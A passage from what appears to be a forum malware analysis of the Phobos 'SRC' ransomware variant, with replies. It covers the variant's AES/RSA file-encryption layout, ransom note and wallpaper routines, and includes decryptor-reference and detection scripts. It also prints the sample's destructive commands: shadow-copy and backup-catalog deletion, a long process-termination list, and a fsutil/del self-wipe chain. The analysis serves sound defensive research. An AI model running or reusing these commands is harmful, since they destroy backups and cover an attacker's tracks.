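    return rsa_pkcs1v15_encrypt(n, e, record, rng)


if __name__ == "__main__":
    n, e, bits = parse_publickeyblob(bytes.fromhex(PUBLIC_KEY_BLOB_HEX))
    print("RSA-%d, e=%d, n=0x%x..." % (bits, e, n >> (bits - 32)))
    # illustrative values only: the page's example ID, its volume serial, DRIVE_FIXED (3), an all-zero key
    rec = build_key_record(FIXED_VALUE, 0xF2479DE1, 0xF8A08166, 3, bytes(32))
    print("record %d bytes -> %d-byte ciphertext" % (len(rec), len(encrypt_key_record(rec))))
```

Without the attackers' private key nothing here can be reversed; the value of the script is in confirming the key parameters (1024-bit modulus, e = 65537, 128-byte output) and in giving a decryptor author a reference for what the 52-byte plaintext record looks like, including the CRC that lets a candidate decryption be validated.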

4.1.12 File encryption (sub_4044E0 / sub_403EE0)

sub_4044E0 is the routine used for files larger than 0x40000 bytes, and sub_403EE0 for files of 0x40000 bytes or less.

encrypto_big_file (sub_4044E0)

Inside the function, the file size is obtained first and divided by 3; the result is stored in the structure's file_size_low field and then in pdwDataLen.

produce_random is called to generate the IV; the generation of the IV is not repeated here, it is described under encrypto_small_file below.

After the IV is generated, the flag selects whether the first or the second key is used; here the flag is 1, so the first key is chosen. sub_402AC0 then imports the IV and KEY into the crypto object (the import routine is also described below).

After key and IV are imported, the size of the structure is computed from the length of the file name and aligned to 16 bytes.

The information is then placed into the file-name structure and CryptEncrypt is called to encrypt its contents. The structure differs from the one in encrypto_small_file only in its first three padding fields, so a separate struct is not defined for it.

Layout:

min_size + file_size / 3 + 0 + file_size + file-name length + file name + CRC32 of everything before it

After the file-name structure is encrypted, the crypto object is destroyed and the data is written to the end of the file.

Once the trailer is written, the file content is encrypted: the file pointer is moved to the start of the content and sub_404400 encrypts it.

sub_404400 reads min_size (0x40000) bytes of data, encrypts them and writes them back into the original file; the algorithm is again AES, in CBC mode.

After encryption the crypto object is destroyed and the function returns.

encrypto_small_file (sub_403EE0)

Inside the function, produce_random is called first to generate 16 random bytes used as the IV.

In produce_random the crypto object is initialised with provider type 0x18.

SetFilePointerEx moves the file pointer to the end, the file size is computed and aligned to 16 bytes; the missing bytes are filled with \x00 by memset and written to the file.

The flag in path_obj selects which key is used; here the flag is 1, so the first generated key is chosen. sub_402AC0 then imports the key and IV into the crypto object.

sub_402AC0 is a conventional CryptImportKey of the key.

With the crypto object initialised, a structure makes the next part easier to read:

struct filename_struct
{
  _DWORD padding1;
  _DWORD padding2;
  _DWORD padding3;
  _DWORD file_size;
  _DWORD padding5;
  _DWORD filename_len;
  _DWORD file_name;
};

The file-name length plus 28 bytes is aligned up to a multiple of 16; where the 28 comes from is explained next.

With that size, HeapAlloc allocates a buffer for the structure; the 28 bytes are everything in the structure other than the file name itself (six DWORDs plus the 4-byte CRC32). The usual step follows: the CRC32 of the structure contents (zero padding + file size + file-name length + file name) is computed and appended to form the complete block, and enc_data encrypts it.

enc_data is plainly an encryption routine using the IV and KEY loaded into the crypto object, so this is AES in CBC mode.

After the file-name information is encrypted, the crypto object is destroyed, the file pointer is moved to the end, and the encryption parameters are written there: the encrypted file size, the encrypted file-name data, the length of the encrypted file-name data and the IV.

Then the encrypted key data, the fixed value and the encrypted-file marker are written.

After the trailer is written, sub_402AC0 imports the KEY and IV into the crypto object again, and the encrypted size is compared with the file size to decide whether encryption is complete: if it is smaller, encryption continues below; otherwise the crypto object is destroyed, the file pointer is moved to the end and 8 bytes of 0xFF are written.

Since encryption is only beginning here, the encrypted size is 0 and the encryption path is taken.

The file pointer is moved to the start of the file and the remaining size is computed; as nothing has been encrypted yet, it equals the file size. If the remaining size is below the minimum block (16 bytes) it is set to 16, and that many bytes are read into read_buffer.

The read size is checked for 16-byte alignment and zero-padded if needed.

enc_data encrypts everything in read_buffer, the file pointer is moved back to the start of the file, all of the encrypted data is written, and the encrypted-size counter is updated.

After this pass the encrypted byte count is checked: if it is still smaller than the file size there is unencrypted content and the loop continues, otherwise encryption ends.

When all of the content is encrypted, the crypto object is destroyed and 8 bytes of 0xFF are appended at the end of the file.

As seen in the file:

Finally the crypto object is destroyed, resources are released and the function returns.
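The plaintext that both routines CRC32 and AES-encrypt before appending it to the file is small and fully described above, so it is worth writing down. The following is an added example, not code from the sample or the post: it builds the file-name block for the small-file and large-file variants and parses it back, rejecting a block whose embedded CRC32 does not match (which is exactly what a decryptor sees when it tries a wrong key or IV). Assumptions for illustration: DWORDs are little-endian, the file name is stored as UTF-16LE and filename_len counts its bytes, and the alignment padding is zero.

```python
import struct
import zlib

# Added example, not code from the sample or the post: build and parse the
# plaintext file-name block that sub_403EE0 / sub_4044E0 CRC32 and AES-encrypt
# before appending it to the file (4.1.12). Layout follows filename_struct
# above; assumptions: little-endian DWORDs, UTF-16LE file name with
# filename_len in bytes, zero padding to the 16-byte alignment.

MIN_SIZE = 0x40000       # chunk size / large-file threshold (decrypted flag 0xE)
HEADER_LEN = 6 * 4       # six DWORDs precede the file name
CRC_LEN = 4              # 24 + 4 = the 28 bytes the sample adds to the name length


def build_name_block(file_name: str, file_size: int, large: bool) -> bytes:
    """Plaintext block as the sample lays it out before CRC32 and AES-CBC."""
    name = file_name.encode("utf-16-le")
    # the large-file routine fills the three leading fields the small-file routine leaves at zero
    lead = (MIN_SIZE, file_size // 3, 0) if large else (0, 0, 0)
    body = struct.pack("<IIIIII", *lead, file_size, 0, len(name)) + name
    body += struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)   # CRC32 over everything before it
    aligned = (len(body) + 15) & ~15                            # 16-byte alignment, as in the sample
    return body.ljust(aligned, b"\x00")


def parse_name_block(block: bytes) -> dict:
    """Inverse of build_name_block; raises ValueError when the embedded CRC32 does not match."""
    f1, f2, _f3, file_size, _f5, name_len = struct.unpack_from("<IIIIII", block, 0)
    crc_off = HEADER_LEN + name_len
    if crc_off + CRC_LEN > len(block):
        raise ValueError("name length exceeds block")
    (crc,) = struct.unpack_from("<I", block, crc_off)
    if zlib.crc32(block[:crc_off]) & 0xFFFFFFFF != crc:
        raise ValueError("CRC32 mismatch")
    return {
        "large": f1 == MIN_SIZE,
        "partial_size": f2,          # file_size / 3 in the large-file variant, otherwise 0
        "file_size": file_size,
        "file_name": block[HEADER_LEN:crc_off].decode("utf-16-le"),
    }


def name_block_is_valid(block: bytes) -> bool:
    """Convenience wrapper: False for any malformed or corrupted block."""
    try:
        parse_name_block(block)
        return True
    except (ValueError, struct.error, UnicodeDecodeError):
        return False


if __name__ == "__main__":
    for name, size, large in (("report.docx", 1000, False), ("backup.vmdk", 0x50000, True)):
        blk = build_name_block(name, size, large)
        print("%-12s %3d bytes -> %s" % (name, len(blk), parse_name_block(blk)))
```

The CRC check is the useful part: because the CRC32 sits inside the AES-encrypted block, decrypting the block with a candidate key and checking the CRC is a cheap, unambiguous test of whether that key is right, without touching the file content.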

4.1.13 Ransom note writing (sub_408BC0)

The function first decrypts the strings it needs: +README-WARNING+.txt, YOUR_FILES_ARE_ENCRYPTED and the note body beginning ::: Greetings ::: (only part of the note is shown, as it is long).

It then checks whether a path for the ransom note was specified; if so, write_random_note is called to write the note.

In write_random_note, whether the process has administrator rights decides whether CreateDirectoryW is called to create the directory; write_ransom_note is then called to write the note.

write_ransom_note is a simple path concatenation followed by writing the note content to that path.

After the note is written, resources are released and the function returns.

4.1.14 Wallpaper replacement (sub_4084E0)

The screen information of the device is obtained first.

A canvas matching the screen size is created, and the text to be shown on the ransom wallpaper is decrypted.

The ransom text is drawn onto the canvas and the background colour is set.

The temporary directory path is obtained, a temporary file is created, .bmp is appended to form a temporary image file, and the canvas image is written to it.

SystemParametersInfoW sets the wallpaper path to that temporary image file, replacing the wallpaper.

After the wallpaper is replaced, resources are released.

The file can be found in the temp directory afterwards.

4.1.15 Shadow copy deletion (exec_del_shadow)

This function is simple: it decrypts the commands it uses and passes them to shell_exec for execution. The commands executed:

vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

4.1.16 Terminating listed processes (close_server)

This function is also simple: it first decrypts the image names of all target processes and formats them into a list. The target image names:

sqlbrowser.exe
sqlwriter.exe
sqlservr.exe
msmdsrv.exe
MsDtsSrvr.exe
sqlceip.exe
fdlauncher.exe
Ssms.exe
sqlagent.exe
fdhost.exe
ReportingServicesService.exe
msftesql.exe
pg_ctl.exe
postgres.exe
UniFi.exe
armsvc.exe
IntelCpHDCPSvc.exe
OfficeClickToRun.exe
DellOSDService.exe
DymoPnpService.exe
Agent.exe
FJTWMKSV.exe
IPROSetMonitor.exe
IRMTService.exe
MBCloudEA.exe
QBCFMonitorService.exe
QBIDPService.exe
RstMwService.exe
TeamViewer_Service.exe
dasHost.exe
IntelCpHeciSvc.exe
RAVBg64.exe
vds.exe
unsecapp.exe
TodoBackupService.exe
MediaButtons.exe
IAStorDataMgrSvc.exe
jhi_service.exe
LMS.exe
DDVDataCollector.exe
DDVCollectorSvcApi.exe
TeamViewer.exe
tv_w32.exe
tv_x64.exe
Microsoft.Photos.exe
MicrosoftEdge.exe
ApplicationFrameHost.exe
browser_broker.exe
MicrosoftEdgeSH.exe
MicrosoftEdgeCP.exe
RtkNGUI64.exe
WavesSvc64.exe
OneDrive.exe
DYMO.DLS.Printing.Host.exe
FtLnSOP.exe
FjtwMkup.exe
FTPWREVT.exe
FTErGuid.exe
qbupdate.exe
QBWebConnector.exe
ShellExperienceHost.exe
RuntimeBroker.exe
IAStorIcon.exe
PrivacyIconClient.exe
SupportAssistAgent.exe
SecurityHealthService.exe
taskhostw.exe
taskhosta.exe
wijca.exe
ktfwswe.exe
HeciServer.exe
mdm.exe
ULCDRSvr.exe
WLIDSVC.EXE
WLIDSVCM.EXE
GoogleCrashHandler.exe
GoogleCrashHandler64.exe
RAVCpl64.exe
igfxtray.exe
hkcmd.exe
igfxpers.exe
PsiService_2.exe
UNS.exe
taskeng.exe
AdobeARM.exe
LenovoReg.exe
dwm.exe
wuauclt.exe
avp.exe
FBService.exe
LBAEvent.exe
PDFProFiltSrvPP.exe
avpsus.exe
klnagent.exe
vapm.exe
ScanToPCActivationApp.exe
BrStMonW.exe
BrCtrlCntr.exe
concentr.exe
redirector.exe
BrccMCtl.exe
BrYNSvc.exe
Receiver.exe
BrCcUxSys.exe
LSCNotify.exe
SelfServicePlugin.exe
wfcrun32.exe
HPNETW~1.EXE
HPScan.exe
taskhost.exe
Teams.exe
AuthManSvr.exe
WLXPhotoGallery.exe
outlook.exe
prevhost.exe
excel.exe
chrome.exe
AcroRd32.exe
RdrCEF.exe
vssadmin.exe
WmiPrvSE.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
agntsrvc.exe
mydesktopqos.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe


Process32FirstW is then used to enumerate all running processes and obtain the executable name of each for comparison; if a name matches an entry in the list, TerminateProcess kills that process, otherwise Process32NextW moves on to the next one.

4.1.17 Self-deletion (sub_407890)

The environment variable ComSpec is read to locate cmd.exe.

The cmd.exe path and the path of the sample's own executable are formatted into the string decrypted under flag 0x38, giving the full command:

C:/Windows/System32/cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 encode.exe & del /q /f encode.exe

The ping acts as a delay so that the running process has exited; fsutil then zeroes the first 131072 bytes (128 KiB) of the executable before del removes it, so the file recovered from free space is already damaged.

The command is executed, and the encryptor deletes itself.
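The commands in 4.1.15 and 4.1.17 are the most detectable moments of the whole run, since each one becomes a separate child process. Below is an added example, not part of the original post: detection logic for those command lines, run over constructed process-creation records shaped like the CommandLine field of Sysmon Event ID 1 or Security event 4688. The field names and the sample records are assumptions; the regexes match the four commands decrypted from this sample and the ping/fsutil/del chain.

```python
import re
from collections import defaultdict

# Added example, not part of the original post: detection logic for the
# command lines this sample executes (shadow-copy deletion in 4.1.15 and the
# ping/fsutil/del self-deletion chain in 4.1.17), run over constructed
# process-creation records. Field names and records are assumptions.

RULES = {
    "vssadmin_delete_shadows": r"\bvssadmin(\.exe)?\s+delete\s+shadows\b.*/all",
    "wbadmin_delete_catalog":  r"\bwbadmin(\.exe)?\s+delete\s+catalog\b",
    "wmic_shadowcopy_delete":  r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b",
    # ping used as a sleep, fsutil zeroing the image, then del: self-deletion
    "fsutil_zero_then_del":    r"\bping\s+\S+\s+-n\s+\d+\b.*\bfsutil\s+file\s+setzerodata\b.*\bdel\s+/q\s+/f\b",
}
_COMPILED = {name: re.compile(pat, re.IGNORECASE | re.DOTALL) for name, pat in RULES.items()}


def classify(command_line: str) -> list:
    """Names of every rule that matches one process command line (empty list if none)."""
    return [name for name, rx in _COMPILED.items() if rx.search(command_line)]


def scan(records: list) -> list:
    """One (host, pid, rule) tuple per hit, in log order."""
    return [(r["host"], r["pid"], rule) for r in records for rule in classify(r["cmd"])]


def hosts_with_inhibit_recovery(records: list, min_rules: int = 2) -> set:
    """Hosts on which at least min_rules distinct rules fired.

    A single vssadmin/wbadmin call is common in legitimate backup jobs; the
    combination of several of these within one host's log is not.
    """
    seen = defaultdict(set)
    for host, _pid, rule in scan(records):
        seen[host].add(rule)
    return {host for host, rules in seen.items() if len(rules) >= min_rules}


# Constructed records: the commands decrypted from this sample on HOST-A, and
# benign look-alikes on HOST-B that must not fire.
SAMPLE_RECORDS = [
    {"host": "HOST-A", "pid": 4120, "cmd": "vssadmin delete shadows /all /quiet"},
    {"host": "HOST-A", "pid": 4124, "cmd": "wbadmin delete catalog -quiet"},
    {"host": "HOST-A", "pid": 4130, "cmd": "wmic shadowcopy delete"},
    {"host": "HOST-A", "pid": 4188, "cmd": 'C:\\Windows\\System32\\cmd.exe /c ping 1.1.1.1 -n 5 & '
                                          'fsutil file setZeroData offset=0 length=131072 "C:\\Users\\Admin\\SRC_Visual.exe" & '
                                          'del /q /f "C:\\Users\\Admin\\SRC_Visual.exe"'},
    {"host": "HOST-B", "pid": 812,  "cmd": "vssadmin list shadows"},
    {"host": "HOST-B", "pid": 815,  "cmd": "ping 8.8.8.8 -n 2"},
    {"host": "HOST-B", "pid": 820,  "cmd": "wmic os get caption"},
]

if __name__ == "__main__":
    for host, pid, rule in scan(SAMPLE_RECORDS):
        print("%-6s pid=%-5d %s" % (host, pid, rule))
    print("hosts with recovery inhibition:", sorted(hosts_with_inhibit_recovery(SAMPLE_RECORDS)))
```

The per-host correlation matters more than any single regex: vssadmin delete shadows appears in backup maintenance scripts, but followed within the same session by wbadmin delete catalog, wmic shadowcopy delete and a self-deleting fsutil/del chain it is a ransomware signature.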

5. Analysis overview

This analysis covers the attack techniques and encryption characteristics of SRC, the latest variant of the Phobos ransomware family. The malware uses AES combined with RSA: files are encrypted, a unique victim identifier is generated, and the .SRC extension is appended. AES encrypts the file content quickly, while RSA encrypts the AES key, so decryption without the attackers' private key is impractical. The attackers disguise the sample as a legitimate file to evade detection and leave a ransom note demanding payment in Bitcoin.

2#
xdloveu52 posted on 2024-10-19 01:21
This is tough material!!! Thanks for sharing!
3#
shaokui123 posted on 2024-10-19 12:27
4#
OP | solar应急响应 posted on 2024-10-19 20:32 | OP

Hello, there is currently no technical way to break it; the only option is to buy the decryption tool from the attackers.
5#
Emanuel posted on 2024-10-19 22:49

Can it not be decrypted?
6#
nzy8513 posted on 2024-10-20 07:55
Impressive work.
7#
OP | solar应急响应 posted on 2024-10-20 14:30 | OP

Hello, there is currently no technical way to break it; the only option is to buy the decryption tool from the attackers.
8#
zhaublitz posted on 2024-10-21 10:11
When will you analyse the Mallox ransomware?
9#
OP | solar应急响应 posted on 2024-10-21 12:48 | OP
zhaublitz posted on 2024-10-21 10:11
When will you analyse the Mallox ransomware?

Hello, we have already analysed it, and we have also successfully broken some older Linux and Windows versions of it; the analysis and decryption write-ups are expected to be published soon, so keep an eye out.
10#
rbj520 posted on 2024-10-31 18:03
This is difficult to learn; thanks for sharing.